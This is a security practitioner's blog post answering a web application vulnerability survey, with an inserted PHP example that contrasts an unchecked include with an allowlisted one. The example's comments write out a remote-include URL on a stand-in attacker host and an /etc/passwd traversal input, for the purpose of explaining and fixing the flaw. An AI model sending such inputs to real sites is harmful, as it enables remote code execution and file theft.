Jeremiah Grossman has recently come out with a new web application survey. If you remember, he did this about a month ago, with some fairly interesting results (I was surprised by a few of the results myself). Like I said, I promised to answer the survey the next time, and so I did, and here are my answers:
1) Who do you perform web application vulnerability assessments for?
a) Security vendor
c) Entertainment and/or educational purposes
d) Other (please specify)
b - generally larger companies but a few small ones
2) What is your most common web application vulnerability assessment
a) Source code review
b) Black Box
c) Combination of A and B
c - Primarily I know nothing about the target in question other than what an attacker would see, but afterwards I start asking questions, learn how the system works, and then I find the really nasty holes. 70% of all attacks come from the inside, and it stands to reason there are more holes than are visible from the outside.
3) Do you use commercial vulnerability scanner products during your assessments? (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
d) Most of the time
a - I have to live on the cheap since I do everything out of pocket these days - although that might change in the future.
4) Do you use open source tools during your assessments? (Paros, Burp, Live HTTP headers, Web Scarab, CAL9000, Nikto, Wikto, etc.)
d) Most of the time
c - I do use a lot of tools, but just as often I use my bare hands and my own homegrown tools.
5) What is your preferred severity rating system for web application
d - I haven’t been super happy with any of the various rating systems, so I use my own, based on real-world information rather than contrived theorems. I’ve never felt like a one-size-fits-all approach to vulnerability assessment has made sense. I really like to think about the circumstances of a company and the vulnerability to weigh the actual risk to them, not to companies like them or, even worse, companies that have nothing at all in common with them.
6) What is the single most dangerous and widespread web application vulnerability?
a) Cross-Site Scripting (XSS)
b) Cross-Site Request Forgery (CSRF)
c) PHP Include
d) SQL Injection
e) Other (please specify)
c - Jeremiah and I talked about this one being kind of a weird question, as A and B are definitely the most widespread, but C is the most dangerous, as it can lead to all the others plus remote server compromise.
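To make the "leads to remote server compromise" point concrete, here is an added example (mine, not code from the original post or from Jeremiah's survey) of the classic unchecked PHP include beside an allowlisted version. The page names and file paths (pages/home.php and so on) are assumptions for illustration only.

```php
<?php
// Added example, not code from the original post. Shows the difference between
// an include driven by a raw request parameter and one resolved through an
// allowlist. File names under pages/ are hypothetical.

// VULNERABLE: the request parameter becomes the file path.
// With allow_url_include=On (and allow_url_fopen=On), ?page=http://attacker.example/x.txt
// pulls PHP from a remote server and executes it (remote file inclusion).
// With allow_url_include=Off, ?page=../../../../etc/passwd still reads local
// files, and any local file the attacker can influence (an upload, a log) can be
// executed as PHP (local file inclusion).
function render_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: map the untrusted name onto a fixed table and never build a
// filesystem path from the raw parameter.
const PAGES = [
    'home'    => 'pages/home.php',    // hypothetical
    'about'   => 'pages/about.php',   // hypothetical
    'contact' => 'pages/contact.php', // hypothetical
];

// Returns the allowlisted path for $page, or null if $page is not known.
function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

function render_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // __DIR__ anchors the include under this script's directory; $file is one
    // of the constants above, never attacker-controlled text.
    include __DIR__ . '/' . $file;
}

render_hardened($_GET['page'] ?? 'home');
```

Turning allow_url_include off (it has defaulted to Off for a long time) closes the remote case but not the local one, which is why the fix is the allowlist rather than an ini setting; a reviewer grepping an application for `include`, `require`, `include_once` or `require_once` whose argument contains `$_GET`, `$_POST`, `$_REQUEST` or `$_COOKIE` finds the vulnerable pattern quickly.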
7) Are Cross-Site Request Forgeries (CSRF) part of your vulnerability assessment methodology?
a - I definitely look for and think about it, although it’s difficult to get people to take it seriously, and it is harder to detect, as it often requires a user account, and that’s something I generally don’t do when I am doing high-level passes over applications. However, it SHOULD be a part of everyone’s testing, since it’s clearly not part of the tests performed by application scanners.
8) From your vulnerability assessment experience, how many websites have serious web application vulnerabilities? (reveal private information, escalate privileges, or allow remote compromise)
a) All or nearly all
e) No idea
c - The reason this rates so high is because of the number of server vulnerabilities, either in stand-alone applications that haven’t been patched or via things like PHP includes in open source applications. Yay for open source!
9) How long would it take you find a single serious web application vulnerability in MOST public websites?
a) Few minutes
b) Hour or two
c) Day and a night
d) A few days
e) Don’t know, never tried
a - Thankfully most people (not large companies but most websites in general) use open source, making this job much easier.
10) How long after a web application vulnerability assessment are most of the severe issues resolved?
a) Within hours
b) The next couple days
c) During the next scheduled software update
d) Months from discovery
e) Just before the next annual assessment
c - Generally companies patch whenever they can, I’ve found. It’s fairly rare for them to patch outside of a sanctioned development release. Oftentimes there are regulatory concerns if they don’t do so.
11) What organizational activity MOST improved the security of their websites?
a) Using modern software development frameworks (.NET, J2EE, Ruby on Rails, etc)
b) Secure software and/or awareness training
c) A stronger security presence in the SDLC
d) Compliance to industry regulations
e) Other (please specify)
e - Baseline threats and compare against the baseline release by release, eventually tying that information into the bonus structure for management. Everything else follows nicely.
12) Are you privy to any undisclosed (not made public) malicious attacks made against a web application? (fraud, identify theft, extortion, theft of intellectual property, etc.)
c) A few
d) Too many to count
So feel free to take the survey for yourself. He’s posted the survey here for everyone to take if they wish. I really recommend you do if you are a web application security penetration tester because some of these results are pretty fascinating and help all of us make decisions on where to take things in the future.